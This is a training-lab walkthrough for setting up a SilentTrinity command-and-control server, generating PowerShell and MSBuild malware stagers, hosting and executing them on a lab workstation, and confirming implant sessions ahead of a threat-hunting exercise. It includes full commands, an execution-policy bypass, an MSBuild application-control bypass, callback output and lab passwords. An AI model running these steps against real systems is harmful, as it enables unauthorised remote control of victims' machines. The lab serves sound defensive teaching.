L1130-Red - SilentTrinity Stagers Attack
- Linux - SSH Session 1 (Team Server)
- Linux - SSH Session 2 (Attacker Session)
- Linux - SSH Session 3 (Malware Host)
- Malware Stager Procurement
- Malware Artifact Execution
- Command and Control Sessions
In this lab, the student will stand up a C2 framework, create a listener for two malware implants, generate stagers, and detonate the payloads. The malware will leave a trail of IoCs that are discover-able in Elastic.
- Formulate a basic understanding of the malware generation and staging process.
- Establish command and control sessions.
Initiate a Command and Control framework. Create malware and launch the Command and Control malware session on the Windows 10 workstation. Hunt for Indicators of Compromise.
Linux - SSH Session 1 (Team Server)
To begin this lab, you will first connect to the Member Server (WS01). Then, you will connect to the Linux server at 10.10.98.20.
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
Upon the first connection to an SSH server, you may get a popup warning to accept the remote server's SSL certificate. Accept the certificate and you will be prompted for credentials as a new window opens. The new window (it will have a black background) is the Putty SSH session. When you close the Putty window, the SSH session is disconnected. During this lab it will be necessary to have multiple SSH sessions Open.
- A note on Putty: As Windows to continue its maturity in managing cross-platform operating systems it formalize its plan to use OpenSSL for its capability to connect with remote systems, including Linux. Currently the OpenSSL platform for Windows is in Beta and available on Windows 10.The necessarily dependencies are not yet fully enabled on Windows 2016. If you were operating from a Windows 10 system, it would be possible to install the OpenSSL module for Windows 10. For this course however, we are using the "Putty" SSH client with its command line arguments.
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu.
- See Lab L0250 for instruction on launching PowerShell
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Putty Session
With the PowerShell window open, run the following command which will launch Putty and initiate a connection to the server at 10.10.98.20. The command instructs putty to open an SSH session on 10.10.98.20 and specify the "itadmin" username.
putty -ssh [email protected]
As previously discussed, you may receive an alert regarding the SSH server SSL certificate. You will then be prompted for credentials. The password for the "[email protected]" account is:
APTClass2021!
 |
|---|
Create Silent Trinity TeamServer
Working now within the Putty session: Use the following commands to access the SILENTTRINITY directory as root and access the virtual environment:
cd /opt/SilentTrinity
Launch the Silent Trinity Team Server
screen -S ST-teamserver
sudo python3.8 st teamserver --port 81 10.10.98.20 APTClass!
 |
|---|
Linux - SSH Session 2 (Attacker Session)
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
- To continue this lab, create the second SSH session with PuTTY, connecting to 10.10.98.20.
- You can launch a second PuTTY session to do this.
Connect to SilentTrinity with Attack Client
SSH to 10.10.98.20 using the PuTTY client installed on the WS01 system. Open a PowerShell and then execute putty using the command line.
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu.
- See Lab L0250 for instruction on launching PowerShell
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Connecting to the SSH Server
From the powershell window, again connect to the Linux server with putty.
putty -ssh [email protected]
Connecting and Configuring the Silent Trinity Attack Server
We will now use the Bash prompts on the SSH server to create a screen session, followed by connecting to the ST server.
Screen
A screen session will allow a persistent SSH session.
cd /opt/SilentTrinity
It is the same process to get to this point for both Console Session 1 and Console Session 2 (and the same outcome).
- Note the use of the “screen” command that will launch a nested SSH console session that will survive the SSH session becoming disconnected.
- Also note the escaped ‘!’ in the client connection string.
ST Client
Now, connect to the team-server as a client with the following command:
sudo python3.8 st client wss://itadmin:APTClass\[email protected]:81
You will now be connected to the Silent Trinity C2 server.
Configure Command and Control Server
Once the SilentTrinity client as connected, execute the following commands one at a time.
listeners
use https
set port 4444
options
start
There is a now a listener running on TCP port 4444 waiting for connections.
Create Stager Malware
The instructions in this package tell the client to reach out to the command server for the remaining instructions (bits / bytes / malware stage). But there is no stager instruction set yet.
- Generate the stager using the following commands
stagers
use powershell
generate https
use msbuild
generate https
Both stagers now reside in the /opt/SilentTrinity/ directory.
 |
|---|
The next step of this lab will open a third SSH session, create a new directory to host the malware stagers, move the stagers and host the malware stagers.
Linux - SSH Session 3 (Malware Host)
For this lab you will need to create multiple SSH sessions; take care to operate each SSH session independently.
- To continue this lab, create the third SSH session with PuTTY, connecting to 10.10.98.20.
- Similar as before, use launch putty via its command line arguments to do this.
Connect to the SSH Server
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu.
- See Lab L0250 for instruction on launching PowerShell
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Connecting to the SSH Server
From the powershell window, again connect to the Linux server with putty.
putty -ssh [email protected]
Move Malware Stagers
Now that the malware stagers have been generated, lets move them into a new folder.
sudo -s
mkdir /opt/web
mv /opt/SilentTrinity/stager.* /opt/web
cd /opt/web
ls
Host Malware Stagers via HTTP
Next, host the malware with python3’s http.server module.
python3 -m http.server
 |
|---|
Now that the malware is being hosted on the Linux server, the next steps of the lab will download and execute the malware on the workstation. The malware is now being hosted at http://10.10.98.20:8000.
Malware Stager Procurement
Now that the SilentTrinity framework is running, we have an attacker client connected, malware generated and served, its time to download the malware and attempt to execute it on the Member Server, WS01.
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
Download Stagers
Open Internet Explorer.
- You may be prompted for first-time Set up. If so, choose Don’t use recommended settings.
- Students are advised to use IE11 for the malware downloads as it is the least likely browser to flag the files.
- Note that it would be possible to again use Invoke-Webrequest for downloading the malware. However, by using a different download method, we are able to determine if certain browser activity is noticed by optics.
Navigate using Internet Explorer’s address bar to http://10.10.98.20:8000 and download both stagers.
http://10.10.98.20:8000
Right (alternate) click both items and choose Save target as... Both items should be saved under the user’s Downloads folder.
 |
|---|
A warning may be presented that can be ignored.
 |
|---|
After the malware stagers have been downloaded, continue onto the next step of the lab to execute the malware.
Malware Artifact Execution
Continuing with the Remote Desktop Session on Member Server WS01, we now will execute the downloaded malware.
Login to Member Server
Connect via Remote Desktop to the Member Server, WS01.
- If you are already connected, use the current session.
- See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu. See Lab L0250 for instruction on launching PowerShell.
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Execution of HTTPS Stager
In PowerShell, run the following command to execute the malware stager for Silent Trinity.
Set-ExecutionPolicy bypass -Force
Import-Module .\Downloads\stager.ps1
PS C:\Users\itadmin> Set-ExecutionPolicy bypass -Force
PS C:\Users\itadmin> Import-Module .\Downloads\stager.ps1
[*] Found info in embedded resources:
- GUID: 00000000-0000-0000-0000-000000000000
- PSK: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
- URLS: ####BEGIN_URLS_SECTION####loremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremipsumloremip
umloremipsumloremipsumloremipsumloremipsum####END_URLS_SECTION####
[+] URLS: https://10.10.98.20:4444
[*] Attempting HTTP POST to https://10.10.98.20:4444/dfde1d15-fb4e-46d9-8063-94d3c4909c98
[-] Attempt #1
[*] Attempting HTTP GET to https://10.10.98.20:4444/dfde1d15-fb4e-46d9-8063-94d3c4909c98
[-] Attempt #1
[*] Downloaded 569104 bytes
[-] 'Boo.Lang.Compiler.dll' was required...
[+] 'Boo.Lang.Compiler.dll' loaded...
[-] 'Boo.Lang.dll' was required...
[+] 'Boo.Lang.dll' loaded...
[*] Compiling Stage Code
[-] 'Boo.Lang.Extensions.dll' was required...
[+] 'Boo.Lang.Extensions.dll' loaded...
[-] 'System.dll' was required...
[+] 'System.dll' loaded...
[-] 'System.Core.dll' was required...
[+] 'System.Core.dll' loaded...
[-] 'System.Web.Extensions.dll' was required...
[+] 'System.Web.Extensions.dll' loaded...
[-] 'Boo.Lang.Parser.dll' was required...
[+] 'Boo.Lang.Parser.dll' loaded...
[-] 'Microsoft.VisualBasic.Devices.dll' was required...
[-] 'Microsoft.VisualBasic.dll' was required...
[+] 'Microsoft.VisualBasic.dll' loaded...
[+] Compilation Successful!
[*] Executing
Jr8d3q6GpM CheckIn
After the malware stager has been executed, continue on to the next phase of the lab.
Execution of MSBuild Stager
Under the context of an environment where application control is in effect the MSBuild.exe binary can be useful. While this lab environment does not restrict application execution in this manner, this lab section will demonstrate malware stager executed using Microsoft-Signed MSBuild.
Next, in PowerShell, run the following command to execute the stager for Silent Trinity with the trusted MSBuild binary.
cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
.\MSBuild.exe c:\Users\itadmin\Downloads\stager.xml
(Note if the above fails, try:)
.\MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml
C:\Users\itadmin>
C:\Users\itadmin> cd c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
c:\Windows\Microsoft.NET\Framework64\v4.0.30319>MSBuild.exe c:\Users\itadmin.labs\Downloads\stager.xml
Microsoft (R) Build Engine version 4.8.3752.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
Build started 3/16/2020 6:58:05 PM.
[+] URLS: https://10.10.98.20:4444
[*] Attempting HTTP POST to https://10.10.98.20:4444/521a336b-e199-4bff-a81a-2207f37d79b2
[-] Attempt #1
[*] Attempting HTTP GET to https://10.10.98.20:4444/521a336b-e199-4bff-a81a-2207f37d79b2
[-] Attempt #1
[*] Downloaded 569104 bytes
[-] 'Boo.Lang.Compiler.dll' was required...
[+] 'Boo.Lang.Compiler.dll' loaded...
[-] 'Boo.Lang.dll' was required...
[+] 'Boo.Lang.dll' loaded...
[*] Compiling Stage Code
[-] 'Boo.Lang.Extensions.dll' was required...
[+] 'Boo.Lang.Extensions.dll' loaded...
[-] 'Boo.Lang.Parser.dll' was required...
[+] 'Boo.Lang.Parser.dll' loaded...
[-] 'Microsoft.VisualBasic.Devices.dll' was required...
[+] Compilation Successful!
[*] Executing
z8DiGrOcG3 CheckIn
Having launched both the malware stagers from PowerShell and from MSBuild, the next lab steps will check to ensure that the Command-and-Control malware has checked into the team-server.
Command and Control Sessions
After having configured the team-server, configured, built, hosted, and executed the Command and Control malware, the workstation should now have created two command and control sessions to the team-server.
Return to the SSH session that was operating the team-server's client (SSH Session Two). Check the team server's client side for client sessions with the following commands:
sessions
list
[1] ST (stagers)(msbuild) ≫ sessions
[1] ST (sessions) ≫ list
┌Sessions──────────────────────────────┬─────────────────────────────┬──────────────┬──────────────┐
│ Name │ User │ Address │ Last Checkin │
├──────────────────────────────────────┼─────────────────────────────┼──────────────┼──────────────┤
│ 521a336b-e199-4bff-a81a-2207f37d79b2 │ LABS\itadmin@WS10-01 │ 10.10.98.14 │ 00h 00m 01s │
├──────────────────────────────────────┼─────────────────────────────┼──────────────┼──────────────┤
│ 162f4b13-6181-4d7f-988f-4da6c43fc307 │ LABS\itadmin@WS10-01 │ 10.10.98.14 │ 00h 00m 00s │
└──────────────────────────────────────┴─────────────────────────────┴──────────────┴──────────────┘
[1] ST (sessions) ≫
With having built a C2 Framework and connected the Member Server into the framework, lets begin the hunt.
Continue on to L1130-Blue
created with the free version of
Markdown Monster